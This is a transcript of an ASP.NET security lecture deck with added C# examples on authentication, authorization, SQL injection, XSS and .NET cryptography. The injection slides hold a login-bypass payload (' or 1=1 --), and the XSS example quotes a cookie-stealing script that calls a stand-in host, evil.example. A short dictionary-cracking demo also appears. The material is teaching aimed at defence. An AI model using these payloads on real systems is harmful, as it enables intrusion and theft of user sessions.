ptuddb2-04 - Security in ASP.NET (Bao mat trong ASP.NET)

Upload: huy-than

Post on 05-Apr-2018

TRANSCRIPT

• 8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net

1/55

Security in ASP.NET

23 January 2003

Lng V Minh

Source: ASP.NET: .NET Security Guidance Architecture Guide

2/55

Contents

Security issues in Web applications; Web.config

Authentication (access rights)

Authorization (usage rights)

Steps to implement the security checks

Some types of attacks

The .NET security library

3/55

SECURITY ISSUES IN THE WEB

4/55

Issues related to Web application security

Hardware-based security

Security at the access gateway (firewall, DoS protection)

Security through secure protocols (SSL, TLS, HTTPS)

Security on the IIS web server

Security at the ASP.NET application layer

SQL database security

Operating-system-level security

5/55

The Web.config configuration file

A security-related portion of the configuration:

6/55

AUTHENTICATION (access rights)

Authentication

7/55

The Web.config configuration file

A security-related portion of the configuration:

8/55

The Web.config configuration file

Controls all security settings of the website

Each website has exactly one Web.config in its root folder

However, additional Web.config files can be placed in subfolders; their settings apply to that folder and are merged with the parent's settings

9/55

User authentication (Authentication)

Answers the question: who are you?

User authentication mechanisms in ASP.NET:

Windows-based

Forms-based

Passport

None

10/55

Authentication: Windows-based

Suited to local web systems (intranet)

No application login prompt is needed; Windows domain accounts must be used

Cookies must be enabled in the browser (strictly, Windows authentication itself travels in the HTTP Authorization header; the cookie requirement comes from session state)

Includes these mechanisms:

Basic Authentication (the password is sent Base64-encoded, which is clear text unless HTTPS is used)

Digest Authentication (the password is proven through a hashed challenge-response and is not sent; IE)

Integrated Authentication (Kerberos or NTLM)

11/55

Authentication: Forms-based

Commonly used for commercial websites

Provides the application's own login page; suits applications with different permission levels

Can work without cookies (cookieless)

12/55

Authentication: Forms-based

13/55

Some issues with cookieless mode

The SessionID is passed in the query string (URL)

Web.config (sessionState cookieless setting)

The session lasts 20 minutes (default) from the user's last action

Session-based attacks:

public terminal (the URL carrying the SessionID remains in the browser history)

sniffer (the SessionID is also sent in the Referer header and written to proxy and server logs)

14/55

15/55

Authentication: None

Uses anonymous access to the web server

Security is handled through ISAPI / IIS rather than ASP.NET

Requests run under the Windows IUSR_machinename account

16/55

AUTHORIZATION (usage rights)

Authorization

17/55

The Web.config configuration file

A security-related portion of the configuration:

18/55

Authorization (usage rights)

Answers the question: what can they see and do?

Checks the user's access rights to folders and files

Mechanisms supported by ASP.NET:

Membership

Role-based security

19/55

Authorization (usage rights)

Answers the question: what can they see and do?

Checks the user's access rights to folders and files

Mechanisms supported by ASP.NET:

Membership

Role-based security

Verb-based: GET, POST, HEAD (based on the HTTP method)

Anonymous users (?)

All users, anonymous ones included (*)

20/55

Authorization (usage rights)

? = anonymous users

* = everyone (all users, authenticated or not)

21/55

Securing a web page

Add a tag to web.config (a <location> element naming the page, with its own <authorization> section)

22/55

Securing a web folder

Create a new Web.config in the folder that must be protected

It only needs to contain the following (an <authorization> section):
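The fragments the last few slides refer to, as an added example in ASP.NET 2.0-or-later syntax (not configuration from the slides): forms authentication and authorization rules in the root Web.config, a <location> element protecting one page, and the minimal Web.config for a protected subfolder. The page, folder and role names (Login.aspx, Report.aspx, Admin/, Admins) are assumed.

```xml
<!-- Root Web.config. Added example, not the deck's own configuration;
     Login.aspx, Report.aspx, the Admin folder and the Admins role are assumed. -->
<configuration>
  <system.web>
    <!-- Forms authentication: unauthenticated users are sent to Login.aspx.
         requireSSL marks the ticket cookie Secure; timeout is in minutes. -->
    <authentication mode="Forms">
      <forms name=".ASPXAUTH" loginUrl="Login.aspx" protection="All"
             requireSSL="true" timeout="20" slidingExpiration="true"
             cookieless="UseCookies" />
    </authentication>

    <!-- Rules are evaluated top to bottom and the first match wins:
         deny anonymous users (?), then allow everyone else (*). -->
    <authorization>
      <deny users="?" />
      <allow users="*" />
    </authorization>

    <!-- Cookieless sessions put the SessionID in the URL; keep cookies on. -->
    <sessionState cookieless="UseCookies" timeout="20" />
  </system.web>

  <!-- Securing a single page. A <location> block is evaluated before the
       parent rules, and * includes anonymous users, so deny ? again first.
       Only the Admins role may POST; any authenticated user may GET/HEAD. -->
  <location path="Report.aspx">
    <system.web>
      <authorization>
        <deny users="?" />
        <allow roles="Admins" verbs="POST" />
        <allow users="*" verbs="GET,HEAD" />
        <deny users="*" />
      </authorization>
    </system.web>
  </location>
</configuration>

<!-- Admin/Web.config: the subfolder file only needs the authorization element;
     authentication mode is inherited from the root and cannot be overridden here. -->
<configuration>
  <system.web>
    <authorization>
      <allow roles="Admins" />
      <deny users="*" />
    </authorization>
  </system.web>
</configuration>
```

Order matters: an <allow users="*"/> placed before <deny users="?"/> grants anonymous access, because * matches anonymous users too.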

23/55

IMPLEMENTATION STEPS

24/55

Step 1 - Authentication = Windows

Create and update Web.config

Create the accounts and groups in the Windows operating system

Start using it

25/55

Step 1 - Authentication = Forms

Create and update Web.config

Create a login page

Choose where user accounts are stored:

Web.config

XML file, text file, database

Web service

26/55

Step 1 - Authentication = Forms

A login form consists of:

Textbox: username

Textbox: password

Checkbox: Remember me (optional)

Button: Login

Password issues:

Minimum length, mixed upper and lower case, special characters

Dictionary attack

Hash the password before storing it (hash function); use a per-user random salt and a slow hash so that a leaked table cannot be attacked with a precomputed dictionary

27/55

Step 1 - Authentication = Forms

Some related functions:

FormsAuthentication.Authenticate(string username, string password);

FormsAuthentication.RedirectFromLoginPage(string userName, bool createPersistentCookie);

Response.Redirect(string url);

Authenticate() only checks the <credentials> element of Web.config and is marked obsolete from ASP.NET 2.0 on; validate the credentials against your own store (or Membership.ValidateUser) and then call RedirectFromLoginPage, which issues the forms ticket.

28/55

29/55

Step 2

Get the user's identity information

User Identity

Get the authorization information

IsInRole (Windows mode only, unless a role provider or a custom principal supplies roles in Forms mode)

Personalization

Store the needed information in Session

Namespace: System.Web.Security

30/55

Step 2

After the user has been authenticated successfully, the user's identity is one of the following types:

GenericIdentity: AuthenticationType, Name, IsAuthenticated

FormsIdentity: AuthenticationType, Name, IsAuthenticated, Ticket

PassportIdentity: AuthenticationType, Name, IsAuthenticated, HasTicket, TicketAge, Item, TimeSinceSignIn

WindowsIdentity: AuthenticationType, Name, IsAuthenticated, IsAnonymous, IsGuest, IsSystem, Token, Impersonate

31/55

Some related functions

using System.Web.Security;

string User.Identity.Name;

bool User.Identity.IsAuthenticated;

bool User.IsInRole(string role);

FormsAuthentication.SignOut();
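Steps 1 and 2 for Forms authentication carried through as one added example (not code from the slides): a login page that verifies a salted PBKDF2 hash and issues the ticket, and a protected page that reads the identity, checks a role and signs out. UserStore is a constructed in-memory stand-in for the account database; the control IDs (txtUser, txtPassword, chkRemember, lblError, lblWelcome, pnlAdmin) and the "Admins" role are assumed.

```csharp
// Added example, not the deck's code. UserStore is a constructed stand-in for
// the account table; control IDs and the "Admins" role are assumed.
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Web;
using System.Web.Security;
using System.Web.UI;

public class StoredCredential
{
    public string UserName;
    public byte[] Salt;      // random per user, generated when the password was set
    public byte[] Hash;      // PBKDF2 output; the password itself is never stored
    public int Iterations;
}

public static class PasswordHasher
{
    // Fresh random salt plus many iterations: a dictionary attack on a leaked
    // table then costs Iterations hash computations per guess and per user.
    public static StoredCredential Create(string userName, string password, int iterations = 100000)
    {
        var salt = new byte[16];
        using (var rng = new RNGCryptoServiceProvider()) rng.GetBytes(salt);
        using (var kdf = new Rfc2898DeriveBytes(password, salt, iterations))
            return new StoredCredential { UserName = userName, Salt = salt,
                                          Hash = kdf.GetBytes(32), Iterations = iterations };
    }

    // Recompute and compare in constant time (no early exit on the first differing byte).
    public static bool Verify(string password, StoredCredential cred)
    {
        if (cred == null) return false;
        using (var kdf = new Rfc2898DeriveBytes(password, cred.Salt, cred.Iterations))
        {
            byte[] candidate = kdf.GetBytes(cred.Hash.Length);
            int diff = 0;
            for (int i = 0; i < candidate.Length; i++) diff |= candidate[i] ^ cred.Hash[i];
            return diff == 0;
        }
    }
}

// Constructed stand-in for the account table; a real store would fetch the
// row with a parameterized query.
public static class UserStore
{
    private static readonly Dictionary<string, StoredCredential> Users =
        new Dictionary<string, StoredCredential>(StringComparer.OrdinalIgnoreCase)
        { { "alice", PasswordHasher.Create("alice", "correct horse battery staple") } };

    public static StoredCredential Find(string userName)
    {
        StoredCredential c;
        Users.TryGetValue(userName ?? "", out c);
        return c;                                   // null for unknown users
    }
}

public partial class Login : Page
{
    protected void btnLogin_Click(object sender, EventArgs e)
    {
        StoredCredential cred = UserStore.Find(txtUser.Text);
        if (!PasswordHasher.Verify(txtPassword.Text, cred))
        {
            lblError.Text = "Invalid user name or password.";   // same message for both failure cases
            return;
        }
        // Issues the forms ticket cookie and redirects to ReturnUrl (or the default page).
        // A persistent cookie survives browser restarts: never on a public terminal.
        FormsAuthentication.RedirectFromLoginPage(cred.UserName, chkRemember.Checked);
    }
}

public partial class Account : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        // Step 2: the identity comes from the validated ticket, not from client input.
        if (!User.Identity.IsAuthenticated) { FormsAuthentication.RedirectToLoginPage(); return; }
        lblWelcome.Text = HttpUtility.HtmlEncode(User.Identity.Name);
        pnlAdmin.Visible = User.IsInRole("Admins");   // needs a role provider (or custom principal) in Forms mode
    }

    protected void btnLogout_Click(object sender, EventArgs e)
    {
        FormsAuthentication.SignOut();
        Session.Abandon();                           // drop server-side state as well
        FormsAuthentication.RedirectToLoginPage();
    }
}
```

Rfc2898DeriveBytes is PBKDF2 with HMAC-SHA1, which is what the .NET Framework ships; the point is the per-user salt and the iteration count, not the underlying hash.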

32/55

SOME TYPES OF ATTACKS

33/55

SQL Injection attacks

Based on how the web page works

Uses input data coming from:

Textbox

QueryString

Technique: malicious SQL fragments are inserted into the SQL statement

Search functions

Paging functions

User authentication functions

34/55

SQL Injection attacks

string sql = "select * from KB where content like '" + search.Text + "'";

With search.Text set to % the statement becomes a wildcard that matches every row:

string sql = "select * from KB where content like '%'";

35/55

SQL Injection attacks

string sql = "select * from Users where user ='" + User.Text + "' and pwd='" + Password.Text + "'";

With User.Text set to  ' or 1=1 --  the password check is commented out and the statement becomes:

string sql = "select * from Users where user ='' or 1=1 --' and pwd=''";

36/55

37/55

SQL Injection attacks

Solutions:

Do not connect with an account that has modify rights; store the connection string encrypted

Use stored procedures to run data queries

Use parameters (Parameter objects) in SQL statements

sql = "select * from Users where user = @user and pwd = @pwd";
SqlCommand cmd = new SqlCommand(sql, con);
cmd.Parameters.AddWithValue("@user", User.Text);
cmd.Parameters.AddWithValue("@pwd", Password.Text);

(The Parameters.Add(string, object) overload used on the original slide is obsolete; AddWithValue is its replacement. Comparing pwd in SQL also implies the password is stored in clear; compare a hash in code instead.)
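The knowledge-base search from slide 34 as an added example (not the deck's code), first as the vulnerable concatenation and then parameterized, with the one thing parameters do not cover: LIKE wildcards in the user's text. The table and column names (KB, content) come from the slide; the stored procedure name dbo.usp_SearchKb and the id/title columns are assumed.

```csharp
// Added example, not the deck's code. KB and content come from the slide;
// dbo.usp_SearchKb, id and title are assumed.
using System;
using System.Data;
using System.Data.SqlClient;

public static class KbSearch
{
    // VULNERABLE (what the slide shows): the user's text becomes SQL syntax.
    // Searching for  %' or 1=1 --  turns the query into
    //   select * from KB where content like '%' or 1=1 --'
    // and returns every row; a UNION SELECT in the same position reads other tables.
    public static string BuildVulnerableSql(string searchText)
    {
        return "select * from KB where content like '" + searchText + "'";
    }

    // Parameters stop injection but not wildcard abuse: escape %, _ and [
    // so the user can search for them literally and cannot match everything.
    public static string EscapeLikePattern(string text)
    {
        return text.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    // SAFE: the text travels as a typed, length-limited parameter and can
    // never change the statement's structure, whatever characters it holds.
    public static SqlCommand BuildSafeCommand(SqlConnection con, string searchText)
    {
        var cmd = new SqlCommand("select id, title from KB where content like @pattern", con);
        SqlParameter p = cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200);
        p.Value = "%" + EscapeLikePattern(searchText) + "%";
        return cmd;
    }

    // Stored-procedure variant: still parameterized, and the application login
    // only needs EXECUTE on the procedure, not SELECT on the table.
    public static SqlCommand BuildProcCommand(SqlConnection con, string searchText)
    {
        var cmd = new SqlCommand("dbo.usp_SearchKb", con) { CommandType = CommandType.StoredProcedure };
        cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value =
            "%" + EscapeLikePattern(searchText) + "%";
        return cmd;
    }

    public static void Main()
    {
        string payload = "%' or 1=1 --";                        // constructed attacker input
        Console.WriteLine(BuildVulnerableSql(payload));          // the injected statement
        Console.WriteLine(EscapeLikePattern(payload));           // what the safe query sees: [%]' or 1=1 --
    }
}
```

For the "store the connection string encrypted" point, the Framework's own tool does it in place: aspnet_regiis -pe "connectionStrings" -app "/MyApp" encrypts that section of Web.config with DPAPI, and the application reads it transparently.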

38/55

Cross-site scripting attacks

Exploit the display of data read from the database (and originally entered by users)

Malicious HTML / JavaScript is inserted into the data content

Solutions: use validation controls

Use regular expressions

Check the length of the input

Use Server.HtmlEncode when writing the data into the page (Server.HtmlDecode is the reverse operation and must not be applied to output)
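Output encoding for the stored-XSS case above, as an added example (not the deck's code): the unencoded rendering beside the encoded one, a second context (URL inside an attribute) that needs a different encoder, and an allow-list validator as the second line of defence. The comment text, control names and the Profile.aspx URL are constructed for the demo.

```csharp
// Added example, not the deck's code; the sample comment and Profile.aspx are constructed.
using System;
using System.Text.RegularExpressions;
using System.Web;

public static class SafeOutput
{
    // VULNERABLE: stored text is written straight into the page, so a comment
    // like <script>location='http://evil.example/?c='+document.cookie</script>
    // saved once in the database runs in every later visitor's browser.
    public static string RenderUnsafe(string commentFromDb)
    {
        return "<div class=\"comment\">" + commentFromDb + "</div>";
    }

    // SAFE: encode at the point of output, for the HTML body context.
    // < > & " become entities, so the script tag is displayed, not executed.
    public static string RenderHtml(string commentFromDb)
    {
        return "<div class=\"comment\">" + HttpUtility.HtmlEncode(commentFromDb) + "</div>";
    }

    // A value placed in a URL inside an attribute is two contexts at once:
    // UrlEncode for the query string, HtmlAttributeEncode for the attribute.
    public static string RenderLink(string userNameFromDb)
    {
        string href = "Profile.aspx?user=" + HttpUtility.UrlEncode(userNameFromDb);
        return "<a href=\"" + HttpUtility.HtmlAttributeEncode(href) + "\">"
             + HttpUtility.HtmlEncode(userNameFromDb) + "</a>";
    }

    // Input validation: allow-list what the field may contain and bound its
    // length. It complements encoding but does not replace it.
    private static readonly Regex UserNamePattern =
        new Regex(@"^[A-Za-z0-9_.-]{3,32}$", RegexOptions.Compiled);

    public static bool IsValidUserName(string input)
    {
        return input != null && UserNamePattern.IsMatch(input);
    }

    public static void Main()
    {
        string evil = "<script>alert(document.cookie)</script>";   // constructed stored payload
        Console.WriteLine(RenderUnsafe(evil));   // script tag reaches the browser intact
        Console.WriteLine(RenderHtml(evil));     // &lt;script&gt;...: inert text
        Console.WriteLine(RenderLink("bob & co"));
        Console.WriteLine(IsValidUserName(evil)); // False
    }
}
```

Validation controls and regular expressions reject obviously hostile input; encoding is what makes the remaining output safe, so keep both.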

39/55

HTTP harvesting attacks

Harvesting the data stored in the database through:

Textbox, query string, cookie

Using SQL statements

Using the paging parameter:

Detail.aspx?id=1

Solutions:

Encrypt (obfuscate) the query string; use System.Drawing to render the data as an image

Monitor how users browse the site

Thu i tc

Obscuring the id only hides the sequence: every request must still check that the current user is authorized to view the requested record, and per-client rate limiting slows bulk enumeration.

40/55

THE .NET SECURITY LIBRARY

System.Security.Cryptography

41/55

The security library in .NET

Encryption

The SSL protocol (Secure Sockets Layer)

Digital signatures

42/55

Encryption

Encryption: transforms data into another representation

Algorithm

Key

Three techniques:

Hash

Asymmetric encryption (public key)

Symmetric encryption (secret key)

43/55

Hashing

A hash algorithm produces a fixed-size number (digest) from a message of any length

Collisions of hash values are very rare

No key is used

The hashed value cannot be reversed to recover the original string

Algorithms: MD5, SHA-1, SHA-256, SHA-512, ... (MD5 and SHA-1 have practical collision attacks; use the SHA-2 family for new code)

44/55

Hashing

MD5CryptoServiceProvider

SHA1CryptoServiceProvider, SHA1Managed

SHA256CryptoServiceProvider, SHA256Managed

SHA512CryptoServiceProvider, SHA512Managed
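The hash classes listed above in use, as an added example (not the deck's code): a SHA-256 integrity digest, and a constructed dictionary attack that shows why an unsalted fast hash of a password (the "dictionary attack" risk from slide 26) is broken by a precomputed table while a per-user salt is not. The word list and the "leaked" hash are constructed for the demo; MD5 appears only because legacy tables used it.

```csharp
// Added example, not the deck's code. Word list and leaked hash are constructed.
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;

public static class HashDemo
{
    public static string Hex(byte[] b)
    {
        return BitConverter.ToString(b).Replace("-", "").ToLowerInvariant();
    }

    // Integrity digest: the same input always yields the same 32-byte output,
    // and a one-byte change anywhere yields an unrelated digest.
    public static string Sha256Hex(byte[] data)
    {
        using (var sha = new SHA256Managed()) return Hex(sha.ComputeHash(data));
    }

    // Unsalted password hash, as legacy tables stored it (MD5 is shown only for that
    // reason; it is not acceptable for new designs).
    public static string Md5Hex(string s)
    {
        using (var md5 = new MD5CryptoServiceProvider())
            return Hex(md5.ComputeHash(Encoding.UTF8.GetBytes(s)));
    }

    // Dictionary attack: hash every candidate once, then crack leaked hashes by lookup.
    // Because the hash is fast and unsalted, one table serves every user in the breach.
    public static Dictionary<string, string> BuildTable(IEnumerable<string> wordlist)
    {
        var table = new Dictionary<string, string>();
        foreach (string w in wordlist) table[Md5Hex(w)] = w;
        return table;
    }

    public static void Main()
    {
        string[] wordlist = { "123456", "password", "qwerty", "letmein", "admin" };   // constructed
        Dictionary<string, string> table = BuildTable(wordlist);

        string leaked = Md5Hex("letmein");                      // an unsalted hash from a breached table
        Console.WriteLine(table.ContainsKey(leaked) ? "cracked: " + table[leaked] : "no match");

        // A per-user random salt defeats the precomputed table: the same password
        // hashes differently for every user, so the attacker starts over per row.
        var salt = new byte[16];
        using (var rng = new RNGCryptoServiceProvider()) rng.GetBytes(salt);
        string salted = Md5Hex(Hex(salt) + "letmein");
        Console.WriteLine(table.ContainsKey(salted) ? "cracked" : "no match (salted)");

        Console.WriteLine(Sha256Hex(Encoding.UTF8.GetBytes("report.pdf contents")));
    }
}
```

Salting removes the shared table; a slow key-derivation function (PBKDF2 via Rfc2898DeriveBytes) then raises the cost of each remaining guess, which is why the two are used together for stored passwords.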

45/55

Symmetric encryption

Encryption uses a single key

The secret key both encrypts and decrypts the message

Algorithms: 3DES, Rijndael (AES), Blowfish, IDEA, ...

46/55

Symmetric encryption

AesCryptoServiceProvider

AesManaged

DESCryptoServiceProvider

RC2CryptoServiceProvider

RijndaelManaged

TripleDESCryptoServiceProvider
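Symmetric encryption with the AES class above, as an added example (not the deck's code): AES-CBC with a fresh random IV per message and an HMAC-SHA256 tag over IV and ciphertext (encrypt-then-MAC), checked before decryption so a tampered message is rejected rather than decrypted to garbage. The keys and the plaintext are generated and constructed for the demo; in a deployment the keys come from a key store.

```csharp
// Added example, not the deck's code. Keys are generated for the demo;
// message layout: IV (16 bytes) | ciphertext | HMAC-SHA256 tag (32 bytes).
using System;
using System.Security.Cryptography;
using System.Text;

public static class SymmetricBox
{
    const int IvLen = 16, TagLen = 32;

    public static byte[] Encrypt(byte[] plaintext, byte[] encKey, byte[] macKey)
    {
        using (var aes = Aes.Create())          // AesCryptoServiceProvider or AesManaged
        {
            aes.Key = encKey;                    // 16, 24 or 32 bytes
            aes.Mode = CipherMode.CBC;
            aes.Padding = PaddingMode.PKCS7;
            aes.GenerateIV();                    // never reuse an IV under the same key
            byte[] ct;
            using (var enc = aes.CreateEncryptor())
                ct = enc.TransformFinalBlock(plaintext, 0, plaintext.Length);

            var body = new byte[IvLen + ct.Length];
            Buffer.BlockCopy(aes.IV, 0, body, 0, IvLen);
            Buffer.BlockCopy(ct, 0, body, IvLen, ct.Length);

            using (var hmac = new HMACSHA256(macKey))   // separate key for the MAC
            {
                byte[] tag = hmac.ComputeHash(body);
                var output = new byte[body.Length + TagLen];
                Buffer.BlockCopy(body, 0, output, 0, body.Length);
                Buffer.BlockCopy(tag, 0, output, body.Length, TagLen);
                return output;
            }
        }
    }

    public static byte[] Decrypt(byte[] message, byte[] encKey, byte[] macKey)
    {
        if (message == null || message.Length < IvLen + TagLen)
            throw new CryptographicException("message too short");

        int bodyLen = message.Length - TagLen;
        using (var hmac = new HMACSHA256(macKey))
        {
            byte[] expected = hmac.ComputeHash(message, 0, bodyLen);
            int diff = 0;                                        // constant-time compare
            for (int i = 0; i < TagLen; i++) diff |= expected[i] ^ message[bodyLen + i];
            if (diff != 0) throw new CryptographicException("tag mismatch");   // verify before decrypting
        }

        using (var aes = Aes.Create())
        {
            aes.Key = encKey; aes.Mode = CipherMode.CBC; aes.Padding = PaddingMode.PKCS7;
            var iv = new byte[IvLen];
            Buffer.BlockCopy(message, 0, iv, 0, IvLen);
            aes.IV = iv;
            using (var dec = aes.CreateDecryptor())
                return dec.TransformFinalBlock(message, IvLen, bodyLen - IvLen);
        }
    }

    public static void Main()
    {
        var encKey = new byte[32]; var macKey = new byte[32];
        using (var rng = new RNGCryptoServiceProvider()) { rng.GetBytes(encKey); rng.GetBytes(macKey); }

        byte[] boxed = Encrypt(Encoding.UTF8.GetBytes("secret session data"), encKey, macKey);  // constructed
        Console.WriteLine(Encoding.UTF8.GetString(Decrypt(boxed, encKey, macKey)));

        boxed[boxed.Length - 1] ^= 1;                            // tamper with the tag
        try { Decrypt(boxed, encKey, macKey); }
        catch (CryptographicException ex) { Console.WriteLine("rejected: " + ex.Message); }
    }
}
```

Without the MAC, CBC ciphertext can be altered bit by bit and the padding error on decryption leaks information (the padding-oracle attack); checking the tag first closes both.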

47/55

Asymmetric encryption

Encryption relies on two keys

The public key encrypts the message; the private key decrypts it

Algorithms: RSA, DSA, ... (DSA is a signature-only algorithm; for encryption use RSA)

48/55

Asymmetric encryption

Classes:

DSACryptoServiceProvider, RSACryptoServiceProvider

ECDiffieHellmanCng

ECDsaCng

49/55

The SSL protocol

SSL (Secure Sockets Layer): a protocol that secures the connection between client and server

50/55

The SSL protocol

51/55

Digital signatures

52/55

Digital signatures
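A digital signature with the RSACryptoServiceProvider class from slide 48, as an added example (not the deck's code): the signer hashes the message with SHA-256 and signs the hash with the private key; the verifier holds only the public parameters and detects any change to message or signature. The key pair is generated for the demo and the message is constructed; in practice the private key lives in a certificate store or HSM.

```csharp
// Added example, not the deck's code. Key pair generated for the demo; message constructed.
using System;
using System.Security.Cryptography;
using System.Text;

public static class Signer
{
    // Provider type 24 (Microsoft Enhanced RSA and AES) is required for SHA-256
    // with RSACryptoServiceProvider; older PROV_RSA_FULL containers fail.
    static RSACryptoServiceProvider NewRsa(int keySize)
    {
        var rsa = new RSACryptoServiceProvider(keySize, new CspParameters(24));
        rsa.PersistKeyInCsp = false;    // demo key: do not leave it in a key container
        return rsa;
    }

    // Sign: SHA-256 over the message, then RSA (PKCS#1 v1.5) with the private key.
    public static byte[] Sign(byte[] message, RSACryptoServiceProvider privateKey)
    {
        return privateKey.SignData(message, new SHA256CryptoServiceProvider());
    }

    // Verify with the public key only: recompute the hash and check it against the signature.
    public static bool Verify(byte[] message, byte[] signature, RSACryptoServiceProvider publicKey)
    {
        return publicKey.VerifyData(message, new SHA256CryptoServiceProvider(), signature);
    }

    public static void Main()
    {
        using (RSACryptoServiceProvider rsa = NewRsa(2048))
        {
            byte[] msg = Encoding.UTF8.GetBytes("transfer 100 to account 42");   // constructed
            byte[] sig = Sign(msg, rsa);

            // The verifier receives only the public half: ExportParameters(false).
            using (var pub = new RSACryptoServiceProvider(new CspParameters(24)))
            {
                pub.PersistKeyInCsp = false;
                pub.ImportParameters(rsa.ExportParameters(false));
                Console.WriteLine(Verify(msg, sig, pub));      // True

                msg[0] ^= 1;                                    // tamper one byte of the message
                Console.WriteLine(Verify(msg, sig, pub));      // False
            }
        }
    }
}
```

On .NET Core and later the same exchange is RSA.Create() with SignData(data, HashAlgorithmName.SHA256, RSASignaturePadding.Pkcs1) and the matching VerifyData; the provider-type workaround applies only to the CSP class listed on the slide.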

53/55

Security tips

Trust nothing 100%

Estimate the risk:

Risk of being attacked

Consequences

Train the staff:

Architects, developers, users, administrators

Review:

Source code, GUI

Microsoft Baseline Security Analyzer 1.2

Scan the network or the local machine

Scan installed updates

Scan well-known issues

54/55

http://www.securitystats.com/tools/password.php

55/55